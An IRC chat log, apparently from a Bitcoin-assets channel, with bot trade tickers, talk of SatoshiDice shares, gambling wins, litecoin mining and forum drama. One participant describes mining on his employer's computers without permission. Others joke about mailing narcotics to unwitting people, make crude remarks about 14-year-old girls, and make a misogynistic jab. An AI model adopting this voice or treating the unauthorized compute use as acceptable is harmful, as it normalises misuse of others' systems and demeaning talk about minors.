BTC in one bid =/ Aug 21 22:18:56 DeaDTerra: ! Aug 21 22:18:57 i get that it pays what isn't paid to a and b but surely there aren't many investments over 2% Aug 21 22:19:15 "Management will be manual, I am not sure if it even can be automated?" Aug 21 22:19:32 i kow it can be automated Aug 21 22:19:34 [15:17] Some lost 250 BTC in one bid =/ Aug 21 22:19:50 SOMEONE won 1070.92083333 BTC Aug 21 22:20:04 Smickles! Aug 21 22:20:13 smickles Aug 21 22:20:17 remember when splatster quit irc Aug 21 22:20:27 Okay cool, I don't like automated though xD I like manual :) Aug 21 22:20:48 rg: he came back yesterday Aug 21 22:20:54 DeaDTerra: i just wanted to point that out to you since it seemd to be a question Aug 21 22:21:09 (i placed it here b/c it's off topic in that thread) Aug 21 22:21:13 Azelphur Aug 21 22:21:15 he never left Aug 21 22:21:19 :O Aug 21 22:21:21 he was gone for like a week Aug 21 22:21:23 lol Aug 21 22:21:32 s/week/2 months Aug 21 22:21:33 pebbles never left Aug 21 22:22:00 okay :) I will keep that in mind Aug 21 22:22:14 seems like I am getting some shit for the admin fee, what would be a more appropriate admin fee? Aug 21 22:22:59 "amount" : 8.01489200, Aug 21 22:22:59 "confirmations" : 0, Aug 21 22:23:02 lol Aug 21 22:23:03 rg ftw Aug 21 22:23:18 i lost a couple .5 ones tho Aug 21 22:23:24 i cant seem to win with the small bets Aug 21 22:23:29 [GLBSE] [BITBOND] 1 @ 0.399 BTC [-] Aug 21 22:23:30 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Aug 21 22:23:32 not even for the easy ones Aug 21 22:24:06 DeaDTerra: that's a good question. did you have to pay 8btc to set it up? Aug 21 22:24:14 does anyone know if satoshidice has a secure arch? do they keep the majority of funds in an offline wallet etc? Aug 21 22:24:49 evoorhees has spoken of use of cold storage Aug 21 22:25:15 cool Aug 21 22:25:24 I'd hate to invest in another bitcoinica :p Aug 21 22:25:39 you have an mpex account Azelphur ? Aug 21 22:25:44 yes Aug 21 22:25:49 [GLBSE] [OBSI.HRPT] 12 @ 0.1037 = 1.2444 BTC [+] Aug 21 22:25:50 I paid 8 BTC to setup the GLBSE and 20 BTC to Setup the MPex then I will pay trade fees on both GLBSE and Mpex as well as transfer fees for the BTC transfer :) Aug 21 22:25:51 lol Aug 21 22:25:54 :) Aug 21 22:26:09 (/me re az) Aug 21 22:26:17 hehe Aug 21 22:26:17 It took me 1 hours to sign up on Mpex as I am retarded with encryption, the reason why I did it was not for a quick buck but to give a service to the community :) Aug 21 22:26:18 i forgot you wrote pympex Aug 21 22:26:22 indeed :P Aug 21 22:27:16 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [+] Aug 21 22:27:18 [GLBSE] [TYGRR.BOND-P] 7 @ 0.61000001 = 4.27 BTC [-] Aug 21 22:27:43 DeaDTerra: i haven't looked at your shareholder agreement, is taking a cut of the divident the only way you plan to be compensated? Aug 21 22:28:13 satoshidice confuses me a bit, they earn 33k btc yearly, 100% of the net profits are distributed as dividends, so how does the people running it make any money? also it says further down that you can only buy 10% of the company, does that not mean that you only have access to 10% of the profits? Aug 21 22:28:47 Indeed, you can only buy up to 10% of the profits Aug 21 22:28:54 yeah, Azelphur 90% of profits stay with evoorhees because only 10% is released to the public Aug 21 22:29:04 for like 320 000 BTC Aug 21 22:29:22 So it's around 10% per year or something like that I think? Aug 21 22:29:30 that seems to conflict with "100% of the net profits are distributed as dividends to shareholders" Aug 21 22:29:41 [MPEX] [S.BVPS] 13 @ 0.00370844 = 0.0482 BTC [+] Aug 21 22:29:43 [MPEX] [S.BVPS] 287 @ 0.00372508 = 1.0691 BTC [+] Aug 21 22:29:46 I suppose technically he is a shareholder if he keeps 90% of the company for himself Aug 21 22:29:46 lol Aug 21 22:29:51 Azelphur: nope, evoorhees is 90% shareholder Aug 21 22:29:58 heh Aug 21 22:29:59 yep, I get it now Aug 21 22:29:59 \o/ Aug 21 22:30:09 \o) Aug 21 22:30:35 Smickles Yes it is :) Aug 21 22:30:51 the bonds will be sold and purchased as a 1:1 ratio so no fees there Aug 21 22:33:49 they really sped satoshidice up Aug 21 22:33:56 i remember when it first came out i played a few bets Aug 21 22:33:56 hmm, the numbers don't seem to look very good unless satoshidice grows drastically Aug 21 22:33:57 it took forever Aug 21 22:34:17 based on my math of putting 150 BTC in at the first IPO, at current numbers I stand to make 15 BTC a year. Aug 21 22:34:28 which is...well I could get that in a FDIC insured bank. Aug 21 22:34:46 well Aug 21 22:34:47 that's their plan Aug 21 22:34:51 the money is for a magazine campaign Aug 21 22:34:55 or something Aug 21 22:35:06 ah I see, so they plan to grow Aug 21 22:35:15 so did bitvps Aug 21 22:35:19 the market just isnt big enough! Aug 21 22:35:31 we need more fucking people Aug 21 22:35:32 [GLBSE] [TYGRR.BOND-P] 8 @ 0.61000001 = 4.88 BTC [-] Aug 21 22:35:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.6 BTC [-] Aug 21 22:35:34 xD Aug 21 22:35:36 who dont htink bitcoin is the wild west Aug 21 22:35:38 for drugs and guns Aug 21 22:35:45 rg: how much bigger did bitvps get? Aug 21 22:36:05 Azelphur: meh, setting pretty at 160 total VPS right now Aug 21 22:36:08 [GLBSE] [YARR] 1 @ 0.975 BTC [+] Aug 21 22:36:14 damn, Azelphur you get 10% at a bank? Aug 21 22:36:20 since i killed off the low end plans, signups are down Aug 21 22:36:22 smickles: I know people :) Aug 21 22:36:23 [GLBSE] [YARR] 18 @ 0.97 = 17.46 BTC [-] Aug 21 22:36:32 but the length in which people stay signed up Aug 21 22:36:34 has increased Aug 21 22:36:36 a shit load Aug 21 22:37:01 so instead of 10 signups, with 2 people who last longer than a month Aug 21 22:37:06 rg: hehe, how are your profits? Aug 21 22:37:12 we have 5 sign ups, with 4 people staying longer than a month Aug 21 22:37:14 is probably the most important question Aug 21 22:37:22 profits are fine Aug 21 22:37:24 Azelphur: please tell me which bank is offering 10% per year interest rates :) Aug 21 22:37:29 we havent posted a single loss Aug 21 22:37:35 evoorhees: http://www.x-o.co.uk/ Aug 21 22:37:37 paid 55.5 BTC in divs last month Aug 21 22:38:24 A) that's in a depreciating currency, not in Bitcoin Aug 21 22:38:26 rg: how was it before the IPO, have you grown significantly and if so by how much? Aug 21 22:38:31 and B) there is risk in that offering Aug 21 22:38:36 we've grown a ton Aug 21 22:38:41 in terms of amount of customers and servers Aug 21 22:38:52 rg: cool :) Aug 21 22:38:53 i expect the new site might help too Aug 21 22:38:58 i got a decent amount of it done last night Aug 21 22:39:05 but still another day or two of work to go Aug 21 22:39:07 since i dont get much done Aug 21 22:39:16 evoorhees: hehe, I don't mean to bash too much just making sure I understand everything, it's the most interesting opportunity I've seen so far Aug 21 22:39:24 I have quite a lot coming out of BS&T, so I'm interested. Aug 21 22:39:37 Azelphur they do keep 90% stake for now and 50% stake minimum Aug 21 22:39:45 mircea_popescu: fun Aug 21 22:39:55 http://wallet.bitvps.com/?page_id=5374 Aug 21 22:40:00 i made that stupid page Aug 21 22:40:01 rg: :D Aug 21 22:40:06 rg: nice Aug 21 22:40:06 I don't think anything is coming out of BS&T Aug 21 22:40:19 hehe, well we'll see Aug 21 22:40:27 I'm either going to be poor or rich over the next few days :P Aug 21 22:40:37 If something does, I'll rejoice for the wonderful news about bitcoins it will bring about. Aug 21 22:40:38 I had perhaps a bit more than I should have in there Aug 21 22:40:43 evoorhees Azelphur is a subsidiary to the bank of mob, inc Aug 21 22:40:52 mircea_popescu: bank of mob? XD Aug 21 22:40:57 DeaDTerra: i'm having a tough time figuring a dividend -> appropriate cut based on exchange fees and such Aug 21 22:41:00 :/ Aug 21 22:41:44 i trhink pirate will pay every last BTC Aug 21 22:41:52 me too Aug 21 22:41:53 and still not admit that bs&t lost tons of money Aug 21 22:42:11 his behaviour does not fit the profile of someone that is planning to run Aug 21 22:42:11 i am really willing to bet he will pay the loss out of pocket rather than admit he was wrong Aug 21 22:42:24 haha you got banned sucker Aug 21 22:42:32 wat Aug 21 22:42:35 ive always said hes been hiding the losses with gpumax Aug 21 22:43:24 sweeet Aug 21 22:43:27 litecoin ask is finally going down Aug 21 22:43:27 Indeed it's quite hard as it depends on the growth and sucess of the IPO Aug 21 22:43:32 i need some cheap litecoinz Aug 21 22:44:01 DeaDTerra: let's figure that you get 1/2 of outstanding shares Aug 21 22:44:28 lol, litecoin is CPU only? Aug 21 22:44:40 I wonder how well Linux cpu scheduler would handle having litecoin slammed to 19 priority Aug 21 22:44:58 .py (5000000*.0034)*.005+20+8 Aug 21 22:44:59 113.0 Aug 21 22:45:25 no Aug 21 22:45:26 its not Aug 21 22:45:39 [GLBSE] [SYNERGY] 2 @ 0.189 = 0.378 BTC [+] Aug 21 22:45:41 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [+] Aug 21 22:45:50 [GLBSE] [TYGRR.BOND-P] 83 @ 0.50000001 = 41.5 BTC [-] Aug 21 22:46:04 .py 113/(270/2) Aug 21 22:46:05 0 Aug 21 22:46:09 lol Aug 21 22:46:11 integer Aug 21 22:46:36 .py 113.0/(270.0/2) Aug 21 22:46:36 0.837037037037 Aug 21 22:46:56 er, and i'm missing the cut Aug 21 22:47:00 rg: I like the sound of a CPU based miner Aug 21 22:47:05 I have a little bit of CPU power ;) Aug 21 22:47:33 .py 113.0/((270.0/2)*.05) Aug 21 22:47:33 16.7407407407 Aug 21 22:47:53 at 5%, it takes you 17 months to recover the costs? Aug 21 22:48:19 how much cpu power Aug 21 22:48:26 you can mine on my private pool if you have a real amount Aug 21 22:48:30 theres also gpu miners Aug 21 22:48:32 cgminer supports ltc now Aug 21 22:49:12 rg: it's only personal use, so I don't have a cluster or anything Aug 21 22:49:17 rg: but watercooled i7 950 @ 4.2ghz Aug 21 22:49:25 ohh lol Aug 21 22:49:28 i thought you said 'quite a bit' Aug 21 22:49:31 not 'a little bit' Aug 21 22:49:37 maybe i read what i wanted to read Aug 21 22:49:40 quite a bit considering I'd never heard of litecoin before and don't own a cluster? Aug 21 22:49:43 :P Aug 21 22:49:57 i have 3MH running through my private pool Aug 21 22:50:47 i am almost 2% of the total ltc network Aug 21 22:51:23 o.O Aug 21 22:51:31 rg: what CPU power you have for that Aug 21 22:51:47 hundreds of cpus Aug 21 22:51:55 dam lol Aug 21 22:51:58 but its not 24/7 Aug 21 22:52:05 i only abuse it when people @ work arent Aug 21 22:52:13 otherwise id probably get in trouble Aug 21 22:52:35 YEAH WELL THEY WERE SUPPOSED TO PAY ME TO MOVE TO ENGLAND Aug 21 22:52:41 SO I CAN SKIM A BIT OFF THE TOP Aug 21 22:52:43 WHILE I WAIT Aug 21 22:52:46 OH DONT JUDGE ME Aug 21 22:52:49 YOUD DO THE SAME THING Aug 21 22:52:53 FINE Aug 21 22:52:53 moar caps Aug 21 22:53:00 WELL JUST HAVE TO AGREE TO DISAGREE Aug 21 22:53:11 Being paid to move to england is overrated Aug 21 22:53:13 I did that once Aug 21 22:53:14 xD Aug 21 22:53:22 assclown: i like london Aug 21 22:53:26 they already paid to have me come over Aug 21 22:53:30 and i had a lot of fun Aug 21 22:53:36 Yea, but you wouldn't if you had to live there Aug 21 22:53:44 the people are like zombies Aug 21 22:53:50 dead eyes everywhere Aug 21 22:53:57 alchoholic 14 year olds Aug 21 22:54:00 etc Aug 21 22:54:05 oh sweet so instead of taking my, highly paid, dream job Aug 21 22:54:11 ill just hang out here Aug 21 22:54:12 on IRC Aug 21 22:54:14 for 12 houors a day Aug 21 22:54:17 sounds like a plan! Aug 21 22:54:28 yeah ive been doing that for 10 years Aug 21 22:54:29 fuck Aug 21 22:54:30 it Aug 21 22:54:43 besides i made a promise to someone that id have my life sorted by 25 Aug 21 22:55:30 alcoholic 14 yo girls i have seen in london. Aug 21 22:55:32 that explains a lot Aug 21 22:55:41 that's fine Aug 21 22:55:44 im not opposed to that Aug 21 22:56:57 It's sad those girls are legal Aug 21 22:57:55 shrug Aug 21 22:57:56 who cares Aug 21 22:58:11 imagine what the world would be like without fucked up people Aug 21 22:58:14 it would be fucked Aug 21 22:59:11 rg: so will I earn money mining on my super i7 do you think Aug 21 22:59:39 [GLBSE] [GIGAMINING] 2 @ 1.01 = 2.02 BTC [-] Aug 21 22:59:58 replies 239 views 4050. day old thread Aug 21 23:00:00 such fail. Aug 21 23:00:02 [GLBSE] [GIGAMINING] 2 @ 1.0001 = 2.0002 BTC [-] Aug 21 23:00:04 [GLBSE] [GIGAMINING] 1 @ 1 BTC [-] Aug 21 23:03:40 rg: http://wiki.solidcoin.info/wiki/Reaper this page says you can mine LTC on a GPU o.O Aug 21 23:05:02 doing 4KH/sec \m/ Aug 21 23:06:18 [GLBSE] [GIGAMINING] 2 @ 1 = 2 BTC [-] Aug 21 23:06:20 [GLBSE] [GIGAMINING] 1 @ 0.927 BTC [-] Aug 21 23:06:21 [GLBSE] [GIGAMINING] 2 @ 0.925 = 1.85 BTC [-] Aug 21 23:06:22 [GLBSE] [PPT.E] 1 @ 1.1 BTC [-] Aug 21 23:07:07 [GLBSE] [FOO.PPPPT] 1 @ 0.575 BTC [+] Aug 21 23:07:07 [GLBSE] [FOO.PPPPT] 1 @ 0.6 BTC [+] Aug 21 23:07:09 [GLBSE] [FOO.PPPPT] 1 @ 0.625 BTC [+] Aug 21 23:07:10 [GLBSE] [FOO.PPPPT] 1 @ 0.65 BTC [+] Aug 21 23:07:11 [GLBSE] [FOO.PPPPT] 1 @ 0.675 BTC [+] Aug 21 23:08:08 foo, cmn, up! not down! Aug 21 23:09:29 That's what it did... Aug 21 23:10:26 more :) Aug 21 23:10:41 When the Pirate singularity collapses, I will be far away from here. In another universe, as a matter of fact. You, on the other hand, will be destroyed in every way it is possible to be destroyed-and even in some which are essentially impossible. Aug 21 23:10:49 lol Aug 21 23:13:37 EmanuelDeOrtego: you are drunk, go sleep it off. Aug 21 23:13:41 [MPEX] [F.GIGA.ETF] 2500 @ 0.00102458 = 2.5615 BTC [+] Aug 21 23:14:03 lol you haven't played hl2 Aug 21 23:14:39 EmanuelDeOrtego: and when you sober up, read all that shit you have written today. It's priceless. Aug 21 23:16:33 "It is not a registered legal entity. It’s a website. I’m not sure what “properly allow investment” means. The terms are stated, they are clear, and I have signed them with provable identification. Bitcoin is a free market, and this is a voluntary contract. I understand most of the world does not operate in this way, but that’s part of the problem, and I’m spending my life fighting it. Not by protesting with signs and letters to congre Aug 21 23:16:40 :D Aug 21 23:16:51 pretty cool eh ? Aug 21 23:16:58 i seriously like the guy. Aug 21 23:17:23 [MPEX] [F.GIGA.ETF] 7084 @ 0.00102458 = 7.2581 BTC [+] Aug 21 23:17:25 I wish I wrote that Aug 21 23:17:30 because I agree with it Aug 21 23:17:37 so then buy his stock Aug 21 23:17:45 Who is this? Aug 21 23:17:48 evoorhees Aug 21 23:17:54 I love that guy. Aug 21 23:17:55 http://theoatmeal.com/pl/minor_differences4/accents Aug 21 23:18:00 the american side Aug 21 23:18:15 He collects all the Bitcoins through SatoshiDice and hoards them for a higher price. Aug 21 23:18:44 Diablo-D3 Aug 21 23:18:56 are you exposed to Pirate? Aug 21 23:19:49 [MPEX] [S.MPOE] 1800 @ 0.00038581 = 0.6945 BTC [-] Aug 21 23:20:21 EmanuelDeOrtego: nope Aug 21 23:20:25 why, what did he do/ Aug 21 23:20:42 [GLBSE] [TYGRR.BOND-P] 4 @ 0.56 = 2.24 BTC [+] Aug 21 23:20:54 Diablo-D3: Just curious, my friend. Aug 21 23:21:04 i thought he quit anyhow Aug 21 23:21:08 ha Aug 21 23:21:17 You could make good money if you are convinced of that. Aug 21 23:21:40 erm? Aug 21 23:21:45 didnt he already announce he quit/ Aug 21 23:22:26 Well, he quit but hasn't paid out yet Aug 21 23:22:57 What Emanuel means is that pirate passthrough are selling low compared to face value Aug 21 23:23:07 ahh Aug 21 23:23:11 thats more usagi's thing Aug 21 23:26:07 [GLBSE] [RUGATU] 1 @ 0.10999999 BTC [+] Aug 21 23:26:18 [GLBSE] [TYGRR.BOND-B] 51 @ 0.1 = 5.1 BTC [-] Aug 21 23:27:35 DeaDTerra: whats with the FUD in the asicminer thread Aug 21 23:28:00 that Friedcat had run away with the cash... Aug 21 23:28:06 I talked to him this morning so this is not the case Aug 21 23:28:26 I remember when fud was exclusively what we called anything microsoft said about linux a decade ago :D Aug 21 23:28:35 i remember that too. Aug 21 23:28:41 DeaDTerra: yeah I doubt that he ran away Aug 21 23:28:46 such as "half the drivers don't work" Aug 21 23:28:47 FUD! Aug 21 23:28:48 hes probably busy getting shit done Aug 21 23:28:52 kernel actually has bugs Aug 21 23:28:53 FUDDDDD Aug 21 23:29:02 [GLBSE] [PUREMINING] 30 @ 0.13898 = 4.1694 BTC [-] Aug 21 23:29:05 mircea_popescu: gnome isnt shit.... wait, thats not fud at all! Aug 21 23:29:09 lol Aug 21 23:29:11 er, is Aug 21 23:29:13 IS shit Aug 21 23:29:18 eheheh Aug 21 23:29:20 I dont want anyome claiming I said gnome isnt shit Aug 21 23:29:29 too late, it's saved. Aug 21 23:29:48 [GLBSE] [DMC] 3 @ 0.03500201 = 0.105 BTC [-] Aug 21 23:29:50 [GLBSE] [DMC] 8 @ 0.035002 = 0.28 BTC [-] Aug 21 23:30:03 DeaDTerra: what pisses me off is Im subscribed to the thread but its not emailing me for updates Aug 21 23:30:14 Diablo-D3 it quit emailing, they prolly got canned for spamming Aug 21 23:30:21 nobody's getting them anymoar. Aug 21 23:30:28 mircea_popescu: but Im getting them on other subjects Aug 21 23:30:33 oh ?! Aug 21 23:30:46 i heard from multiple people they're nto getting emails nemore. Aug 21 23:30:53 [GLBSE] [BDK.BND] 11 @ 0.101 = 1.111 BTC [-] Aug 21 23:30:57 last was at 3:19pm my time Aug 21 23:32:30 [GLBSE] [BITCOINMINV] 1 @ 0.15 BTC [+] Aug 21 23:32:35 [GLBSE] [TYGRR.BOND-P] 5 @ 0.56 = 2.8 BTC [+] Aug 21 23:32:35 [GLBSE] [TYGRR.BOND-P] 100 @ 0.50000001 = 50 BTC [-] Aug 21 23:32:36 [GLBSE] [TYGRR.BOND-P] 15 @ 0.5 = 7.5 BTC [-] Aug 21 23:33:17 [GLBSE] [BIB.PIRATE] 30 @ 0.435 = 13.05 BTC [-] Aug 21 23:33:19 [GLBSE] [BIB.PIRATE] 200 @ 0.433 = 86.6 BTC [-] Aug 21 23:33:44 i take it bib.pirate is uninsured Aug 21 23:34:09 [GLBSE] [FOO.PPPPT] 3 @ 0.5 = 1.5 BTC [-] Aug 21 23:34:14 correct Aug 21 23:34:39 myeah. Aug 21 23:34:46 what a shit storm...forums are trashed Aug 21 23:34:48 [GLBSE] [TYGRR.BOND-P] 5 @ 0.5 = 2.5 BTC [-] Aug 21 23:34:50 [GLBSE] [TYGRR.BOND-P] 1 @ 0.49 BTC [-] Aug 21 23:34:51 [GLBSE] [TYGRR.BOND-P] 3 @ 0.401 = 1.203 BTC [-] Aug 21 23:34:51 [GLBSE] [TYGRR.BOND-P] 9 @ 0.4 = 3.6 BTC [-] Aug 21 23:35:27 Down down down goes the prices Aug 21 23:36:52 where do boogers come from Aug 21 23:36:56 [GLBSE] [BDT] 40 @ 1.03 = 41.2 BTC [+] Aug 21 23:36:58 [GLBSE] [MPOE.ETF] 8 @ 1.4 = 11.2 BTC [+] Aug 21 23:37:06 !ticker s.bvps Aug 21 23:37:07 [MPEX:S.BVPS] 1day: 0.00363919 / 0.00369363 / 0.00372508 (2021 shares, 7.46 BTC), 30day: 0.001175 / 0.00314714 / 0.00435 (86699 shares, 272.85 BTC) Aug 21 23:37:14 come on fuckers Aug 21 23:37:29 [GLBSE] [NYAN.C] 2 @ 0.95 = 1.9 BTC [+] Aug 21 23:37:39 ;;seen brendio Aug 21 23:37:40 brendio was last seen in #bitcoin-assets 2 days, 10 hours, 53 minutes, and 56 seconds ago: hi and soon bye Aug 21 23:37:50 ;;later tell brendio dont forget.. i want to put those cheaper bvps shares on glbse Aug 21 23:37:51 The operation succeeded. Aug 21 23:38:32 ;;seen rg Aug 21 23:38:32 rg was last seen in #bitcoin-assets 40 seconds ago: ;;later tell brendio dont forget.. i want to put those cheaper bvps shares on glbse Aug 21 23:38:49 ;;later tell rg pithy, pithy, poo, poo Aug 21 23:38:49 The operation succeeded. Aug 21 23:39:14 [GLBSE] [GOLD] 15 @ 0.01 = 0.15 BTC [+] Aug 21 23:40:24 man i cannot lose at SD Aug 21 23:40:42 what still ? Aug 21 23:40:49 [GLBSE] [YABMC] 10 @ 0.13 = 1.3 BTC [+] Aug 21 23:41:28 rg: Just quit right now Aug 21 23:41:32 You will be better off Aug 21 23:41:41 ahh, this is lame Aug 21 23:41:48 watch and notify are seperate options Aug 21 23:41:53 Also, I just played Satoshi Dice and lost on the least risky bet. Aug 21 23:41:54 so if I watch a thread it doesnt notify me Aug 21 23:41:56 thats fucking useless Aug 21 23:41:58 "amount" : 2.66713066, Aug 21 23:41:58 "amount" : 6.01104400, Aug 21 23:41:58 "amount" : 6.01104400, Aug 21 23:41:58 "amount" : 8.01489200, Aug 21 23:41:58 "amount" : 2.00334800, Aug 21 23:41:59 "amount" : 2.00334800, Aug 21 23:42:00 I only got a Satoshi Aug 21 23:42:01 "amount" : 4.00719600, Aug 21 23:42:03 this is why one should buy Satoshi Dice shares Aug 21 23:42:03 "amount" : 2.00334800, Aug 21 23:42:07 "amount" : 8.01489200, Aug 21 23:42:09 "amount" : 2.00334800, Aug 21 23:42:11 "amount" : 2.00334800, Aug 21 23:42:13 "amount" : 4.00719600, Aug 21 23:42:15 "amount" : 2.00334800, Aug 21 23:42:28 all wins in a row?? Aug 21 23:42:29 lmao dude... Aug 21 23:42:32 wat? Aug 21 23:42:40 i never won anything :( Aug 21 23:42:46 animallllllllllll house Aug 21 23:43:14 its those 8 btc wins that really made it worht it Aug 21 23:43:20 but im too afraid to play anymore Aug 21 23:43:22 that movie is based on a frat at my college Aug 21 23:43:25 52 lol Aug 21 23:43:33 indeed copumpkin Aug 21 23:43:41 they have college for vegetables nao ?! Aug 21 23:43:47 jeez us schools really gone downhill Aug 21 23:43:52 :) Aug 21 23:43:57 pff schools in our state are better than most Aug 21 23:43:58 I've been there, it's a shithole Aug 21 23:44:04 the frat, that is Aug 21 23:44:06 a community college in MA is like a regular college in Alabama Aug 21 23:44:25 you're in massacchhussettss ? Aug 21 23:44:31 massachusetts Aug 21 23:44:45 ikr. Aug 21 23:45:00 yes and so is cockpumpkin Aug 21 23:45:01 we are bros Aug 21 23:45:04 ma bros Aug 21 23:45:14 i lived in lowell for like a year. Aug 21 23:45:17 which is how people from MA pronounce Marlboro Aug 21 23:45:25 yo can i get some mah broz Aug 21 23:45:31 mah bro lightz Aug 21 23:45:56 they had there a nice briock building called Aug 21 23:46:00 MIDDLESEX COLLEGE Aug 21 23:46:08 lowell is a shithole Aug 21 23:46:13 which... i mean extremitysex lolz Aug 21 23:46:23 [GLBSE] [ADMINSORTED] 1 @ 1 BTC [+] Aug 21 23:46:25 no wonder you moved back to rolamia Aug 21 23:46:32 rg i didn't mind. and no, from there i went to mexico. Aug 21 23:46:58 now that makes sense Aug 21 23:47:04 with a pit stop in moldova Aug 21 23:47:11 tour of shit! Aug 21 23:47:12 ehm Aug 21 23:47:15 world tour of shit! Aug 21 23:47:17 dude why are you so EskimoBobish Aug 21 23:47:32 cause you're so cute when you're worked up Aug 21 23:47:35 ahahaha Aug 21 23:48:04 [GLBSE] [BIB.PIRATE] 3 @ 0.251 = 0.753 BTC [-] Aug 21 23:48:05 the school is actually in NH Aug 21 23:48:24 UNH is nice Aug 21 23:48:29 at least i had fun there Aug 21 23:48:31 and liked it Aug 21 23:48:39 so basically copumpkin you live free or pie ? Aug 21 23:48:49 har har Aug 21 23:48:57 shuddup it was a good one. Aug 21 23:48:59 lol Aug 21 23:49:05 !ticker s.mpie Aug 21 23:49:07 !ticker s.mpoe Aug 21 23:49:07 Invalid ticker. Aug 21 23:49:08 [MPEX:S.MPOE] 1day: 0.00034759 / 0.00039291 / 0.00041337 (11222897 shares, 4,409.65 BTC), 30day: 0.0001 / 0.00036532 / 0.00041337 (57487018 shares, 21,001.67 BTC) Aug 21 23:49:13 [GLBSE] [PPT.A] 20 @ 1.05 = 21 BTC [-] Aug 21 23:49:14 [GLBSE] [PPT.A] 3 @ 1 = 3 BTC [-] Aug 21 23:49:20 pff can i have like 20% of your daily Aug 21 23:49:28 crazy huh Aug 21 23:49:41 i announce s.dice ppl buy s.mpoe Aug 21 23:49:54 [MPEX] [S.MPOE] 10200 @ 0.0003919 = 3.9974 BTC [+] Aug 21 23:50:03 yeajh, that's what im talking about. Aug 21 23:50:14 and i mean... P/E ratio for mpoe is about 20x. Aug 21 23:50:26 those muppets on the forum giving the guy flak for 10x Aug 21 23:51:06 people give me shit all the time Aug 21 23:51:29 remember that asshole who went and messaged me to tell me that the div payments werent to his liking Aug 21 23:51:36 no? Aug 21 23:51:50 it was in the beginning Aug 21 23:51:54 the guy who expected to get rich in 1 month Aug 21 23:52:07 what do you pay in average ? ~50 or so a month ? Aug 21 23:52:17 naw Aug 21 23:52:18 !ticker s.bvps Aug 21 23:52:18 lower Aug 21 23:52:19 [MPEX:S.BVPS] 1day: 0.00363919 / 0.00369363 / 0.00372508 (2021 shares, 7.46 BTC), 30day: 0.001175 / 0.00314714 / 0.00435 (86699 shares, 272.85 BTC) Aug 21 23:52:29 i will start paying out min 50 Aug 21 23:52:30 probably Aug 21 23:52:34 okay so, now Aug 21 23:52:35 hopefully Aug 21 23:52:38 [GLBSE] [TYGRR.BOND-P] 10 @ 0.405 = 4.05 BTC [+] Aug 21 23:52:39 [GLBSE] [TYGRR.BOND-P] 100 @ 0.40000001 = 40 BTC [-] Aug 21 23:52:40 .py 0.00369363 * 1000000 Aug 21 23:52:41 3693.63 Aug 21 23:52:45 Ill get notifications on asicminer Aug 21 23:52:47 grumble Aug 21 23:52:55 so you're doing a little better than 10x, maybe 8x or so ? Aug 21 23:53:10 !ticker asicminer Aug 21 23:53:12 [GLBSE:ASICMINER] [Bid: 0.0985] [Ask: 0.0988] [Spread: 0.0003] [Last: 0.098799] [24hVol: 99.1449708] [7dAvg: 0.10487889] Aug 21 23:53:35 !ticker gigamining Aug 21 23:53:38 [GLBSE:GIGAMINING] [Bid: 0.9255] [Ask: 1.035] [Spread: 0.1095] [Last: 0.925] [24hVol: 198.14989] [7dAvg: 1.01259883] Aug 21 23:53:47 dude what teh F are people on about the forum Aug 21 23:53:54 the flagship of glbse does 200 a day Aug 21 23:53:57 mpex does 4k a day Aug 21 23:54:01 what are we even discussing here Aug 21 23:54:07 heh Aug 21 23:54:15 are these people nuts ? Aug 21 23:54:19 lol yeah I justr ead that thread Aug 21 23:54:41 even worse I think he just copy pasted that smere from other times he's posted it Aug 21 23:54:54 are they like, being paid to be stupid ? Aug 21 23:55:41 like i said...shitstorm...forums trashed...I blame...mmm chaaang Aug 21 23:55:51 mircea_popescu: did you see the part where he suggested that i be MPOE-PR? Aug 21 23:55:57 did that little bitch ever put up pictures of his server farm yet ? Aug 21 23:56:06 smickles no, i only get digests Aug 21 23:56:13 and even so im starting to get fed up Aug 21 23:56:14 [GLBSE] [NYAN.C] 1 @ 0.95 BTC [+] Aug 21 23:58:35 i think he has settled into calling you/mpoe-pr 'the porn star' Aug 21 23:58:55 blame me for what? Aug 21 23:59:03 because women on the interwebz are absolutely prostitutes Aug 21 23:59:17 Chaaaang-Noi we're trying to discern the source of forum idiocy. Aug 21 23:59:19 *everything*...just kidding. I saw you've been handling trolls on the forums. Aug 21 23:59:30 fucking trolls Aug 21 23:59:46 i honestly want my own forums, or an invite only forum where people are not retarded Aug 21 23:59:49 [GLBSE] [BIB.PIRATE] 8 @ 0.6 = 4.8 BTC [+] Aug 21 23:59:55 heh Aug 21 23:59:57 ha ha Aug 22 00:00:00 someone just lost 60 btc on SD Aug 22 00:00:06 was it you ? Aug 22 00:00:14 an invite only forum would sorta be like irc almost. Aug 22 00:00:20 nope it was not me Aug 22 00:00:36 works. sd made its money back and you have what to buy shares with Aug 22 00:00:37 iv seen atlats and matthew troll each other for hours on irc Aug 22 00:00:45 [GLBSE] [BIB.PIRATE] 4 @ 0.649 = 2.596 BTC [+] Aug 22 00:00:51 ya but that was -otc Aug 22 00:01:01 btcst and bitcoin and even in this one... Aug 22 00:01:03 -otc turned into los angeles Aug 22 00:01:49 [MPEX] [S.MPOE] 40915 @ 0.0003919 = 16.0346 BTC [+] Aug 22 00:01:51 [MPEX] [S.MPOE] 1270 @ 0.00039262 = 0.4986 BTC [+] Aug 22 00:01:52 [MPEX] [S.MPOE] 8708 @ 0.00039598 = 3.4482 BTC [+] Aug 22 00:01:53 [MPEX] [S.MPOE] 9807 @ 0.00039648 = 3.8883 BTC [+] Aug 22 00:02:48 "amount" : 6.01104400, Aug 22 00:02:50 yoink Aug 22 00:02:56 ok i think ive taken enough out of SD today Aug 22 00:02:59 that makes 66 btc Aug 22 00:03:22 time to celebrate Aug 22 00:03:23 rg, you must be god. Aug 22 00:03:31 who wants illegal narcotics shipped to thier house without their knowledge Aug 22 00:03:37 cause it just happened to a lucky someone in here! Aug 22 00:03:54 lmao Aug 22 00:04:06 [GLBSE] [TYGRR.BOND-P] 12 @ 0.55 = 6.6 BTC [+] Aug 22 00:04:15 Buyer Notes: Please write HEROIN on the front Aug 22 00:04:37 i wonder what the mailing service would do with a letter that said HEROIN Aug 22 00:04:47 i used to write heroin on my flour Aug 22 00:04:58 rg: nothing Aug 22 00:05:10 Diablo-D3: i bet theyd let the dogs sniff it Aug 22 00:05:13 if nothing hit theyd ship it Aug 22 00:05:24 god damn its time for bed Aug 22 00:05:24 they'd ship it soaked in dog pee Aug 22 00:05:29 i didn't realize it was 5pm already Aug 22 00:06:09 yes, it is Aug 22 